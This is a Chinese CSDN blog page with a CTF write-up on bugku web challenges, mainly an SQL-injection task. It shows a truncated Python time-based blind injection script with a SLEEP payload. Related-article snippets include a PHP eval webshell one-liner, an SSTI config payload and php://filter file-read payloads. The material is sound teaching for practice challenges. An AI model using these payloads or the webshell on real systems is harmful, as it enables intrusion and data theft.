bugku web 系列题目思路总结(五)

最新推荐文章于 2022-06-01 16:39:10 发布
最新推荐文章于 2022-06-01 16:39:10 发布
阅读量532 收藏 1
点赞数
CC 4.0 BY-SA版权
分类专栏: ctf 日报
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/yukinorong/article/details/98987978
本文总结了Bugku平台上的几个Web安全题目,重点讨论了如何处理SQL注入问题。通过exploit PHP的explode()函数、时间盲注、字符串过滤绕过等方法,分析了如何发现注入点、获取数据库信息。文章提到了union、order by等关键字的过滤及利用重叠方法绕过,并介绍了updatexml()和extractvalue()函数在信息获取中的应用。尽管解密第三关的密文和理解某些页面逻辑成为难点,但本文提供了对Web安全挑战深入理解的宝贵思路。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

bugku insert into 注入

PHP explode() 将字符串打散为数组。根据第一个参数分割。
一个基于时间的盲注代码。

# -*- coding:utf-8 -*-
import requests
import sys
# 基于时间的盲注,过滤了逗号 ,
sql = "127.0.0.1'+(select case when substr((select flag from flag) from {0} for 1)='{1}' then sleep(5) else 0 end))-- +"
url = 'http://123.206.87.240:8002/web15/'
flag = ''
for i in range(1,
最低0.47元/天 解锁文章

200万优质内容无限畅学
bugku web知识点总结(1-12)
yifujiadeng的博客
04-16 353
bugku web总结(1-12) web1: ctrl+u,查看页面源码,直接能看到flag,没啥好说的 web2: 让你做三位的算数题,但是答案只让你填一位,好在是前端验证,我们可以直接改,f12打开控制台,源码里有个maxlength变量,初始值设了个1,我们改成3,就可以正常输入了,输入正确答案,flag就有了 web3: 打开之后,给了一串源码 $what=$_GET['what']; //接受post过来的参数what,存到what里 echo $what; //打印 if($wha
关于BugkuCTF中web题目的总结
weixin_44149478的博客
02-25 1378
web2 很简单的一道题,进去直接f12查看源码,发现flagflag KEY{Web-2-bugKssNNikls9100} 计算器 进去发现是一个计算题,算出答案后输入,发现只能输入一位,查看源码,发现有一条“maxlength=1”,将1改为2或直接删掉,输入计算题答案,得到flagflag{CTF-bugku-0032} web基础$_GET f12,发现源码是一个条件输出的代码,...
bugku题的web类解析
01-29
这个是我自习写的bugkuweb的解析,其中四个题因为各种原因没有做出来,分别为welcome to bugku,孙xx的博客,login2,login4。也许有写的不好的地方,见谅,
Bugku-Web题wp (前九题)
Risker
03-14 1114
分享一下本人做题记录,不足之处多多指正。这里先贴一波之前的做题记录,还在更新中(补之前的wp)签到题:直接加入qq群,公告里就有key: Web2:打开发现都是滑稽,查看源代码就可以找到key了: 文件上传:上传php文件,显示不是图片,上传图片,又必须是php,显然普通上传不能同时满足这两个条件,所以上传个图片用burp抓包,发送到repeater:观察到有个filename=”****.png...
bugku中的web
m0_62619269的博客
05-20 809
Simple_SSTI_1 先来简单看一下什么是SSTI模板注入 {{ … }}:装载一个变量,模板渲染的时候,会使用传进来的同名参数这个变量代表的值替换掉。 {% … %}:装载一个控制语句。 {# … #}:装载一个注释,模板渲染的时候会忽视这中间的值 很简单的模板注入,查看页面源代码 很明显,flag在secret_key下。最下面说在flas k里,我们经常建立一个SECRET_KEY,上方模板注入,直接访问URL+?flag={undefined{ config .SECRET_KEY}}得到f
bugku web 系列题目思路总结(七)
yukinorong的博客
08-14 983
bugku 文件包含2 查看源码,有upload.php,结合题目应该是关键信息。进入 上传文件。 参考博客: https://blog.csdn.net/qq_33417843/article/details/79756682 第一种方法:上传一句话木马,<?=eval($_POST['shell']);> 上传文件1.php;.jpg。 链接菜刀失败。 第二种方法,构造语句<...
bugku web 系列题目思路总结(一)
yukinorong的博客
07-31 2384
bugku web 系列题目,仅作为自身答题积累,包含题目关键步骤,并没有包含答案,只包含前三分之一。 希望自己能坚持刷下去。加油。 bugku post 可利用脚本为链接传输post数据 import requests s = requests.Session() r = s.get("http://123.206.87.240:8002/post/") values = {'what':'f...
bugku web 系列题目思路总结(四)
yukinorong的博客
08-08 391
bugku welcome to bugkuctf 查看页面,分析源码。user不为空且要以文件方式读入字符串"welcome to the bugkuctf" 利用上次学习的php伪协议, 这里引用两个博客: https://www.cnblogs.com/Pinging/p/8278168.html https://blog.csdn.net/wy_97/article/details/774...
bugku web/crypto 系列题目思路总结(三)
yukinorong的博客
08-07 702
bugku 告诉你一个秘密 参考博文:https://www.jianshu.com/p/3cacf1dd479c 需要了解base64编码特征才能想到。 利用键盘位置做密码很巧妙。 bugku 这不是md5 确实不是md5,十六进制字符串直接转字符即可。 bugku 贝斯家族 base编码系列除了64之外还有16 32 36 58 62 91等。后面的数字为用于编码的种类,数字越大,一般来讲编码...
bugku web/crypto 系列题目思路总结(二)
yukinorong的博客
08-05 472
bugku web4 http://123.206.87.240:8002/web4/ p1 = function checkSubmit(){var a=document.getElementById("password");if("undefined"!=typeof a){if("67d709b2b 后半部分 54aa2aa648cf6e87a7114f1"==a.value)return!...
bugku web知识点总结_2
yifujiadeng的博客
04-25 406
bugku web总结(14-24) web14: 打开题目,可以看到一个链接click me 点击后显示了index.php,可能提示flag存在index.php中 如上图我们还可以看到多了一个参数file,很像是文件包含,这里我们可以尝试使用php伪协议读取文件内容,放上一个介绍php伪协议的文章链接https://segmentfault.com/a/1190000018991087 构造payload:php://filter/read=convert.base64-encode/resour
bugkuweb)题练习(1
MIGENGKING的博客
05-02 511
WEB 2 20 打开题目后我们看到一张动态笑脸图: 然后我们直接按F12就可以的得到题目flag 接着我们直接在题目上输入flag就可以解决题目
bugku题库 web
weixin_40658927的博客
03-22 801
1.web 3:刚开始打开页面时为空白,此时我们应想到查看此页面的源代码之后我们可以在源代码的最后面看到一串背被编译过的密码,我们复制这一段密码并用编码转换把密码转换回来我们的flag便出现了。2.你必须让他停下来打开页面你会发现这个页面一直在刷新,但大多数时候都是不显示图片的,即便你看到了图片,你也看不到flag此时我们应该首先想到查看源代码,之后我们会发现该页面使用了js的setTimeout...
Bugkuweb练习题()
weixin_43342135的博客
07-19 854
.web2 1.先打开网站,然后发现网页一片空白,查看源代码后,得到flag,然后提交。 二.计算器 1.然后打开网站后,发现是个输入验证码的事,但是输入的时候,发现了验证码的输入框的长度只有一个数字的长度,然后用控制台打开将maxlength参数修改。 将此处的1修改成2,后更新网页,输入正确的答案,得到flag: 三.web基础$_GET 1.打开网页后,发现提示: 2.用harba...
bugku web题集锦
skysys的研究小屋
06-01 1405
变量1 <?php error_reporting(0); include "flag1.php"; highlight_file(__file__); if(isset($_GET['args'])){ $args = $_GET['args']; if(!preg_match("/^\w+$/",$args)){ die("args error!"); } eval("var_dump($$args);"); } ?> 正则在线测试:ht
bugkuweb4(入门题目
qq_45775244的博客
12-11 633
完全自己做出来的,真的好激动啊!!! 题目: f12查看源代码:百度百分号加十六进制了解到应该是UTF-8编码 p1:%66%75%6e%63%74%69%6f%6e%20%63%68%65%63%6b%53%75%62%6d%69%74%28%29%7b%76%61%72%20%61%3d%64%6f%63%75%6d%65%6e%74%2e%67%65%74%45%6c%65%6d%65%6...
bugku web题总结
h0ryit的博客
06-12 1716
陆陆续续将bugkuweb题刷了一大半,剩下的都是分比较高的难点的题,做题过程中遇到了很多的问题,大部分题就没离开过write up,不过还是学到了很多,因此想做一个总结。 线索收集 拿到一个ctf题的第一步就是收集信息,特别是一些隐藏的提示信息,否则会寸步难行。 常见的信息点 网页文档的DOM信息 网页注释 有些题会在网页注释中给出提示信息,比如给出一部分源码之类的...
bugku - Web
UP's blog
09-03 3266
刚刚入门CTF,如有错误,望大佬指教
bugku-web 前35题详解 (当然除去题目失效)
team39的博客
05-10 3072
第二题:计算器 尝试输入96,发现只能输入一位数字,于是输入“9”,点击验证,弹出“输入有误!” F12查看网页源代码,发现输入框的最大长度是1。 于是更改最大长度为100,输入正确答案96,得到flag。 第三题:web基础$_GET 题目分析:根据题面和所给代码,判断出是一道GET传参的题。GET传参时请求的参数是在URL中,所以直接在网址后面加上?what=flag。 第四题:web基础$_POST 题目分析:根据题面和所给代码,判断出是一道POST传参的题。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值